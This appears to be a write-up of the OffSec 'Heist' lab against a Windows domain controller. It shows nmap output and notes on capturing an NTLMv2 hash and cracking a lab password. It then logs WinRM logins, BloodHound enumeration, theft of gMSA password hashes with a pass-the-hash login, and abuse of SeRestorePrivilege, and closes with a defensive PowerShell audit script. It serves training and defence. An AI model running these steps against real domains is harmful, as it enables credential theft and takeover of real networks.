Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 05:08 EDT
Nmap scan report for 192.168.196.165
Host is up (0.034s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-03 09:09:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T09:09:44+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-09-03T09:09:04+00:00
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-08-01T02:27:33
|_Not valid after: 2025-01-31T02:27:33
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
HTTP (8080)
We will use responder to capture an NTLMv2 hash
Local exploitation
We will crack it.
enox:california
Privilege escalation
We will try to become svc_apache$
In Shortest Paths To High Value Targets
The user enox belongs to the Web Admin group
Right-click on the arrow
rc4_hmac is what interests us here.
We are indeed connected as svc_apache$
SeRestorePrivilege is interesting, an intuition confirmed by the contents of the Documents folder.
┌──(kali㉿kali)-[~/oscp/heist]
└─$ crackmapexec winrm 192.168.196.165 -u user.txt -p pass.txt
SMB 192.168.196.165 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
HTTP 192.168.196.165 5985 DC01 [*] http://192.168.196.165:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 192.168.196.165 5985 DC01 [+] heist.offsec\enox:california (Pwn3d!)
┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u enox -p california
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox
┌──(kali㉿kali)-[~/oscp/heist]
└─$ bloodhound-python -d heist.offsec -u enox -p california -c all -ns 192.168.196.165
INFO: Found AD domain: heist.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.heist.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.heist.offsec
INFO: Done in 00M 07S
*Evil-WinRM* PS C:\Users\enox\desktop\application> ./gmsapasswordreader.exe --accountname svc_apache$
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 4FC1682833B24CF2225248D67DF7E618
[*] aes128_cts_hmac_sha1 : 056248716EB814ECEEA9BEF3EC864606
[*] aes256_cts_hmac_sha1 : E5BCF79903496F24EA9D753F1EFC3146701B6ADF88A00B03E9EE73483DD73984
[*] des_cbc_md5 : 4AB398EFD91523CE
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 31424E5B49C147E64854B47E50AA4C98
[*] aes128_cts_hmac_sha1 : 409F1002404B512AC58B4BEB22013568
[*] aes256_cts_hmac_sha1 : F133616850B2F938715388DFD581398A58C9AF9B45F329710A278EE3E9074395
[*] des_cbc_md5 : 7564AE6407BADCC4
┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>
*Evil-WinRM* PS C:\users\svc_apache$\documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeRestorePrivilege Restore files and directories Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\users\svc_apache$\documents> ./EnableSeRestorePrivilege.ps1
Debug:
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct TokPriv1Luid
{
public int Count;
public long Luid;
public int Attr;
}
public static class Advapi32
{
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenProcessToken(
IntPtr ProcessHandle,
int DesiredAccess,
ref IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool LookupPrivilegeValue(
string lpSystemName,
string lpName,
ref long lpLuid);
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool AdjustTokenPrivileges(
IntPtr TokenHandle,
bool DisableAllPrivileges,
ref TokPriv1Luid NewState,
int BufferLength,
IntPtr PreviousState,
IntPtr ReturnLength);
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern uint GetLastError();
}
Debug: Current process handle: 1620
Debug: Calling OpenProcessToken()
Debug: Token handle: 2652
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 0
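The two weaknesses this writeup chains are a gMSA whose password can be read by an ordinary group (Web Admin, giving enox the rc4_hmac of svc_apache$) and a service account holding SeRestorePrivilege. The following PowerShell is an added defensive audit example, not part of the original writeup or of any tool it uses: it lists every gMSA together with the principals (and, for groups, the effective members) allowed to retrieve its managed password, and it parses a secedit export to show which accounts hold SeRestorePrivilege and related backup/ownership rights. It assumes the RSAT ActiveDirectory module is installed, that it runs as a local administrator on a domain-joined host (secedit /export needs that), and the function names Get-GmsaPasswordReaders and Get-UserRightHolders are my own.

```powershell
# Added audit example (hypothetical helper names); requires the RSAT ActiveDirectory
# module and local admin rights for the secedit export.
Import-Module ActiveDirectory

function Get-GmsaPasswordReaders {
    # For each gMSA, resolve PrincipalsAllowedToRetrieveManagedPassword. Any member
    # of a listed group can read the managed password, so such a group is as
    # sensitive as the service account itself (the Web Admin -> svc_apache$ case).
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
        ForEach-Object {
            $gmsa = $_
            foreach ($dn in $gmsa.PrincipalsAllowedToRetrieveManagedPassword) {
                $principal = Get-ADObject -Identity $dn -Properties objectClass
                $members = @()
                if ($principal.objectClass -eq 'group') {
                    $members = (Get-ADGroupMember -Identity $dn -Recursive).SamAccountName
                }
                [pscustomobject]@{
                    gMSA             = $gmsa.SamAccountName
                    AllowedPrincipal = $principal.Name
                    PrincipalType    = $principal.objectClass
                    EffectiveReaders = ($members -join ', ')
                }
            }
        }
}

function Get-UserRightHolders {
    param(
        [string[]]$Rights = @('SeRestorePrivilege', 'SeBackupPrivilege', 'SeTakeOwnershipPrivilege')
    )
    # Export the effective local security policy and parse the [Privilege Rights]
    # section. secedit writes holders as comma-separated SIDs prefixed with '*'.
    $cfg = Join-Path $env:TEMP 'secpol-audit.inf'
    secedit /export /cfg $cfg /quiet | Out-Null
    $lines = Get-Content $cfg
    Remove-Item $cfg -ErrorAction SilentlyContinue

    foreach ($right in $Rights) {
        $line = $lines | Where-Object { $_ -match "^$right\s*=" } | Select-Object -First 1
        if (-not $line) { continue }   # right assigned to nobody on this host
        $values = ($line -split '=', 2)[1].Trim() -split ','
        foreach ($v in $values) {
            $v = $v.Trim()
            $name = $v
            if ($v.StartsWith('*')) {
                # Translate the SID to DOMAIN\Account where possible; keep the raw SID otherwise.
                try {
                    $sid  = New-Object System.Security.Principal.SecurityIdentifier($v.TrimStart('*'))
                    $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
                } catch { $name = $v }
            }
            [pscustomobject]@{ Right = $right; Holder = $name }
        }
    }
}

# Report: gMSA readers that are not tightly scoped groups, and service or user
# accounts (rather than built-in operator groups) holding restore/backup rights.
Get-GmsaPasswordReaders | Format-Table -AutoSize
Get-UserRightHolders    | Format-Table -AutoSize
```

Run on a domain controller, the first table would show svc_apache$ readable by the Web Admin group with enox as an effective reader, and the second would list any account granted SeRestorePrivilege by policy; both findings are worth alerting on, since either one turns a low-privilege foothold into control of the DC.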